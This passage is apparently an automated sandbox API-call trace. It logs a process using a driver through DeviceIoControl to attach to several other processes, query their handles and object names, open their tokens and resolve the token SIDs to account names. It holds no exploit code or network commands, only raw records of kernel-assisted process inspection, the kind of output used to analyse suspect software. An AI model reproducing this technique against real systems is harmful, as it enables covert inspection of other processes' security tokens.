(Object=0xfffffa8003910240) returned 0x12 [0245.999] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.999] ObfDereferenceObject (Object=0xfffffa80020a1070) returned 0x1 [0245.999] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.999] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.999] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.999] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0245.999] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.999] PsAcquireProcessExitSynchronization () returned 0x0 [0246.000] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880053c85d0) [0246.000] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002033ba0, HandleInformation=0x0) returned 0x0 [0246.000] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.000] PsReleaseProcessExitSynchronization () returned 0x2 [0246.000] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0246.000] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.000] ObfDereferenceObject (Object=0xfffffa8002033ba0) returned 0x1 [0246.000] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.000] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.000] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.000] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.000] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.000] PsAcquireProcessExitSynchronization () returned 0x0 [0246.000] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880053c85d0) [0246.000] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.000] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.000] PsReleaseProcessExitSynchronization () returned 0x2 [0246.000] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0246.000] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.000] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.000] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.000] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x54c) returned 0xc8 [0246.001] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.001] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f49b30, HandleInformation=0x0) returned 0x0 [0246.001] ObOpenObjectByPointer (in: Object=0xfffffa8001f49b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.001] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x14 [0246.001] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.001] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.001] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.001] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.001] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.003] CloseHandle (hObject=0xc4) returned 1 [0246.003] CloseHandle (hObject=0xc8) returned 1 [0246.003] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.003] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.003] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.003] PsAcquireProcessExitSynchronization () returned 0x0 [0246.003] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880053c85d0) [0246.004] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020a9f20, HandleInformation=0x0) returned 0x0 [0246.004] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.004] PsReleaseProcessExitSynchronization () returned 0x2 [0246.004] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0246.004] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.004] ObfDereferenceObject (Object=0xfffffa80020a9f20) returned 0x1 [0246.004] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.004] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.004] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.004] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0246.004] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.004] PsAcquireProcessExitSynchronization () returned 0x0 [0246.004] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880053c85d0) [0246.004] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020a8070, HandleInformation=0x0) returned 0x0 [0246.004] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.004] PsReleaseProcessExitSynchronization () returned 0x2 [0246.004] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0246.004] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.004] ObfDereferenceObject (Object=0xfffffa80020a8070) returned 0x1 [0246.005] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.005] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.005] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.005] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.005] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.005] PsAcquireProcessExitSynchronization () returned 0x0 [0246.005] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880053c85d0) [0246.005] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.005] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.005] PsReleaseProcessExitSynchronization () returned 0x2 [0246.005] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0246.005] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.005] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.005] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.005] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xc8 [0246.005] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.005] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001fc5b30, HandleInformation=0x0) returned 0x0 [0246.005] ObOpenObjectByPointer (in: Object=0xfffffa8001fc5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.006] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x14 [0246.006] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.006] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.006] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.006] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.006] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.008] CloseHandle (hObject=0xc4) returned 1 [0246.008] CloseHandle (hObject=0xc8) returned 1 [0246.008] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.008] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.008] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.008] PsAcquireProcessExitSynchronization () returned 0x0 [0246.008] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880053c85d0) [0246.008] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f9fdd0, HandleInformation=0x0) returned 0x0 [0246.008] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.008] PsReleaseProcessExitSynchronization () returned 0x2 [0246.008] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0246.009] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.009] ObfDereferenceObject (Object=0xfffffa8001f9fdd0) returned 0x1 [0246.009] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.009] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.009] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.009] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0246.009] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.009] PsAcquireProcessExitSynchronization () returned 0x0 [0246.009] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880053c85d0) [0246.009] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001eec7d0, HandleInformation=0x0) returned 0x0 [0246.009] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.009] PsReleaseProcessExitSynchronization () returned 0x2 [0246.009] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0246.009] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.009] ObfDereferenceObject (Object=0xfffffa8001eec7d0) returned 0x1 [0246.009] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.009] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.009] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.009] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.009] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.009] PsAcquireProcessExitSynchronization () returned 0x0 [0246.010] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880053c85d0) [0246.011] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.011] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.011] PsReleaseProcessExitSynchronization () returned 0x2 [0246.011] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0246.011] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.011] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.011] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.012] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x318) returned 0xc8 [0246.012] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.012] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001fe3b30, HandleInformation=0x0) returned 0x0 [0246.012] ObOpenObjectByPointer (in: Object=0xfffffa8001fe3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.012] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x14 [0246.012] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.012] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.012] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.012] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.012] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.014] CloseHandle (hObject=0xc4) returned 1 [0246.014] CloseHandle (hObject=0xc8) returned 1 [0246.014] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.015] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.015] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.015] PsAcquireProcessExitSynchronization () returned 0x0 [0246.015] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880053c85d0) [0246.015] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fd9470, HandleInformation=0x0) returned 0x0 [0246.015] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.015] PsReleaseProcessExitSynchronization () returned 0x2 [0246.015] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0246.015] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.015] ObfDereferenceObject (Object=0xfffffa8001fd9470) returned 0x1 [0246.015] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.015] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.015] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.015] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0246.015] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.015] PsAcquireProcessExitSynchronization () returned 0x0 [0246.015] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880053c85d0) [0246.015] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001eaef20, HandleInformation=0x0) returned 0x0 [0246.015] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.015] PsReleaseProcessExitSynchronization () returned 0x2 [0246.015] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0246.016] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.016] ObfDereferenceObject (Object=0xfffffa8001eaef20) returned 0x1 [0246.016] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.016] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.016] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.016] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.016] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.016] PsAcquireProcessExitSynchronization () returned 0x0 [0246.016] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880053c85d0) [0246.016] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.016] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.016] PsReleaseProcessExitSynchronization () returned 0x2 [0246.016] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0246.016] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.016] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.016] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.016] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.016] OpenProcess 